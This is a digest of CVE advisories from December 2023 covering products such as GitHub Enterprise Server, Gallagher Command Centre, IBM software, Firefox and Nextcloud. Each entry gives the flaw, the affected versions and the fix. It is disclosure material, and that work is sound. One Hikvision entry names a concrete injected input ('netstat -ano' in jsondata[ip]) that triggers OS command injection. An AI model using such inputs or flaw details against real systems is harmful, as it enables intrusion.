enterprise_server -- enterprise_serverAn incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-214.9CVE-2023-51379
product-cna@github.com
enterprise_server -- enterprise_serverImproper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-216.5CVE-2023-6804
product-cna@github.com
enterprise_server -- enterprise_serverA race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-215.8CVE-2023-6803
product-cna@github.com
ethex -- contractsA vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271.2023-12-194.3CVE-2019-25157
cna@vuldb.com
gallagher -- command_centreClient-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior.2023-12-185.4CVE-2023-23570
disclosures@gallagher.com
gallagher -- command_centre_diagnostics_serviceA reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).2023-12-185.5CVE-2023-46686
disclosures@gallagher.com
gallagher -- command_centre_serverIncorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.2023-12-184.3CVE-2023-23576
disclosures@gallagher.com
gallagher -- command_centre_serverAn observable response discrepancy in the Gallagher Command Centre REST API allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all versions of 8.50 and prior.2023-12-184.3CVE-2023-23584
disclosures@gallagher.com
gallagher -- controller_7000Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)).2023-12-186.8CVE-2023-6355
disclosures@gallagher.com
getsentry -- symbolicatorSymbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator's API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`.2023-12-224.3CVE-2023-51451
security-advisories@github.com
github -- enterprise_serverA path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-216.8CVE-2023-46645
product-cna@github.com
github -- enterprise_serverA race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-216.3CVE-2023-46649
product-cna@github.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.2023-12-156.5CVE-2023-6051
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names, leading to incorrect representation in the UI.2023-12-155.7CVE-2023-5512
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.2023-12-154.3CVE-2023-5061
cve@gitlab.com
gradio -- gradioGradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitrary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0.2023-12-225.6CVE-2023-51449
security-advisories@github.com
grails -- grailsGrails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0.2023-12-216.5CVE-2023-46131
security-advisories@github.com
hcl_software -- hcl_bigfix_mobile/modern_client_managementDue to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage.2023-12-216.6CVE-2023-28025
psirt@hcl.com
hcl_software -- hcl_launchHCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure.2023-12-214.3CVE-2023-45700
psirt@hcl.com
hcltech -- connectionsHCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.2023-12-156.5CVE-2023-28022
psirt@hcl.com
hikvision -- intercom_broadcast_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.2023-12-176.5CVE-2023-6894
cna@vuldb.com
hikvision -- intercom_broadcasting_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.2023-12-176.3CVE-2023-6895
cna@vuldb.com
hitachi_energy -- rtu500_series_cmuA vulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in a buffer overflow and, as a final consequence, a reboot of an RTU500 CMU.2023-12-195.9CVE-2023-6711
cybersecurity@hitachienergy.com
home_assistant -- home_assistantHome Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.2023-12-154.3CVE-2023-50715
security-advisories@github.com
ibm -- aixIBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963.2023-12-226.2CVE-2023-45165
psirt@us.ibm.com
ibm -- aixIBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970.2023-12-196.2CVE-2023-45172
psirt@us.ibm.com
ibm -- cloud_pak_for_business_automationIBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805.2023-12-184.9CVE-2023-40691
psirt@us.ibm.com
ibm -- db2_mirror_for_iIBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.2023-12-185.3CVE-2023-47741
psirt@us.ibm.com
ibm -- informix_jdbcIBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116.2023-12-206.3CVE-2023-35895
psirt@us.ibm.com
ibm -- qradar_siemIBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372.2023-12-194.9CVE-2023-47146
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197.2023-12-205.3CVE-2023-47703
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522.2023-12-205.4CVE-2023-47707
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228.2023-12-204.3CVE-2023-47705
psirt@us.ibm.com
ibm -- urbancode_deployAn IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.2023-12-206.2CVE-2023-42012
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510.2023-12-205.3CVE-2023-42013
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.2023-12-205.3CVE-2023-47161
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512.2023-12-194.3CVE-2023-42015
psirt@us.ibm.com
idemia -- multiple_productsWhen handling contactless cards, a specific function used to get additional information from the card does not check the boundary of the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device.2023-12-156.8CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan -- infinispanA flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-186.5CVE-2023-3628
secalert@redhat.com
infinispan -- infinispanA flaw was found in Infinispan's REST. Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-184.3CVE-2023-3629
secalert@redhat.com
infinispan -- infinispan-serverA flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.2023-12-184.4CVE-2023-5236
secalert@redhat.com
instipod -- duouniversalkeycloakauthenticatorAn information disclosure vulnerability exists in the challenge functionality of the instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. A user logging in to Keycloak using the DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability.2023-12-234.5CVE-2023-49594
talos-cna@cisco.com
insyde -- insydeh2oTOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 before version 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.2023-12-164.7CVE-2022-24351
cve@mitre.org
iscute -- cute_http_file_serverCross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.2023-12-205.4CVE-2023-50639
cve@mitre.org
i̇stanbul_soft_informatics_and_consultancy_limited_company -- softomi_gelişmiş_c2c_pazaryeri_yazılımıImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Gelişmiş C2C Pazaryeri Yazılımı allows Reflected XSS. This issue affects Softomi Gelişmiş C2C Pazaryeri Yazılımı: before 12122023.2023-12-216.1CVE-2023-6122
iletisim@usom.gov.tr
jetbrains -- intellij_ideaIn JetBrains IntelliJ IDEA before 2023.3.2, code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration.2023-12-216.3CVE-2023-51655
cve@jetbrains.com
jetbrains -- youtrackIn JetBrains YouTrack before 2023.3.22268, the authorization check for inline comments inside thread replies was missed.2023-12-154.3CVE-2023-50871
cve@jetbrains.com
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system. It has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read the database.2023-12-156.5CVE-2023-48395
twcert@cert.org.tw
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error messages.2023-12-154.3CVE-2023-48393
twcert@cert.org.tw
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'adults' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49269
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49270
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49271
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49272
help@fluidattacks.com
kodcloud -- kodexplorerReflected Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51 allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.2023-12-196.1CVE-2023-49489
cve@mitre.org
libtiff -- libtiffAn issue was found in the tiffcp utility distributed by the libtiff package where processing a crafted TIFF file may cause a heap-based buffer overflow that leads to an application crash.2023-12-185.5CVE-2023-6228
secalert@redhat.com
lightxun -- iptv_gatewayA vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.2023-12-214.3CVE-2023-7026
cna@vuldb.com
linux -- kernelA null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.2023-12-214.4CVE-2023-7042
secalert@redhat.com
m-files_corporation -- m-files_serverA vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. An authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.2023-12-206.5CVE-2023-6910
security@m-files.com
microsoft -- edge_chromiumMicrosoft Edge (Chromium-based) Security Feature Bypass Vulnerability2023-12-154.3CVE-2023-36878
secure@microsoft.com
microsoft -- windowsWindows Local Session Manager (LSM) Denial of Service Vulnerability2023-12-206.5CVE-2022-44684
secure@microsoft.com
microweber -- microweberBusiness Logic Errors in GitHub repository microweber/microweber prior to 2.0.2023-12-154.3CVE-2023-6832
security@huntr.dev
moxa -- iologik_e1200_seriesA weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization.2023-12-236.5CVE-2023-5962
psirt@moxa.com
mozilla -- firefoxA `<dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6869
security@mozilla.org
mozilla -- firefoxBrowser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6872
security@mozilla.org
mozilla -- firefoxMultiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6135
security@mozilla.org
mozilla -- firefoxIn some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6868
security@mozilla.org
mozilla -- firefoxApplications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6870
security@mozilla.org
mozilla -- firefoxUnder certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6871
security@mozilla.org
mozilla -- firefox/firefox_esr`EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.5CVE-2023-6865
security@mozilla.org
mozilla -- firefox/firefox_esrThe timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.1CVE-2023-6867
security@mozilla.org
mozilla -- multiple_productsThe `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-196.5CVE-2023-6860
security@mozilla.org
mozilla -- multiple_productsWhen resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-195.3CVE-2023-6857
security@mozilla.org
mozilla -- thunderbirdThe signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6.2023-12-194.3CVE-2023-50761
security@mozilla.org
mozilla -- thunderbird
When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6.
Published: 2023-12-19 | CVSS Score: 4.3 | Source & Patch Info: CVE-2023-50762, security@mozilla.org
mr-corner -- amazing_little_poll
Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the "lp_admin.php" file in the "question" and "item" parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading.
Published: 2023-12-20 | CVSS Score: 4.6 | Source & Patch Info: CVE-2023-6769, cve-coordination@incibe.es
netapp -- ontap
ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.
Published: 2023-12-15 | CVSS Score: 4.6 | Source & Patch Info: CVE-2023-27317, security-alert@netapp.com
netapp -- ontap_mediator
ONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API.
Published: 2023-12-21 | CVSS Score: 5.3 | Source & Patch Info: CVE-2023-27319, security-alert@netapp.com
nextcloud -- security-advisories
Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.
Published: 2023-12-22 | CVSS Score: 5.4 | Source & Patch Info: CVE-2023-49791, security-advisories@github.com
nextcloud -- security-advisories
Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them to execute more authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.
Published: 2023-12-22 | CVSS Score: 5.3 | Source & Patch Info: CVE-2023-49792, security-advisories@github.com
nextcloud -- security-advisories
The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available.
Published: 2023-12-22 | CVSS Score: 4.3 | Source & Patch Info: CVE-2023-49790, security-advisories@github.com
openbsd -- openssh
In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.
Published: 2023-12-18 | CVSS Score: 5.5 | Source & Patch Info: CVE-2023-51384, cve@mitre.org
pedroetb -- tts-api
A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability.
Published: 2023-12-19 | CVSS Score: 5.5 | Source & Patch Info: CVE-2019-25158, cna@vuldb.com
phpgurukul -- online_notes_sharing_system
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability.
Published: 2023-12-22 | CVSS Score: 5.5 | Source & Patch Info: CVE-2023-7054, cna@vuldb.com
phpgurukul -- online_notes_sharing_system
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability.
Published: 2023-12-21 | CVSS Score: 4.3 | Source & Patch Info: CVE-2023-7051, cna@vuldb.com
phpgurukul -- online_notes_sharing_system
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739.
Published: 2023-12-22 | CVSS Score: 4.3 | Source & Patch Info: CVE-2023-7052, cna@vuldb.com
phpgurukul -- online_notes_sharing_system
A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability.
Published: 2023-12-22 | CVSS Score: 4.3 | Source & Patch Info: CVE-2023-7055, cna@vuldb.com
phpmyfaq -- phpmyfaq
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.
Published: 2023-12-16 | CVSS Score: 5.4 | Source & Patch Info: CVE-2023-6889, security@huntr.dev
phpmyfaq -- phpmyfaq
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.
Published: 2023-12-16 | CVSS Score: 5.4 | Source & Patch Info: CVE-2023-6890, security@huntr.dev
progress_software_corporation -- sitefinity
A malicious user could potentially use the Sitefinity system for the distribution of phishing emails.
Published: 2023-12-20 | CVSS Score: 4.7 | Source & Patch Info: CVE-2023-6784, security@progress.com
pymedusa -- medusa
Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.
Published: 2023-12-22 | CVSS Score: 5.3 | Source & Patch Info: CVE-2023-50258, security-advisories@github.com
pymedusa -- medusa
Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.
Published: 2023-12-22 | CVSS Score: 5.3 | Source & Patch Info: CVE-2023-50259, security-advisories@github.com
redhat -- keycloak
A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt" which could be used to bypass the security patch implemented to address CVE-2023-6134.
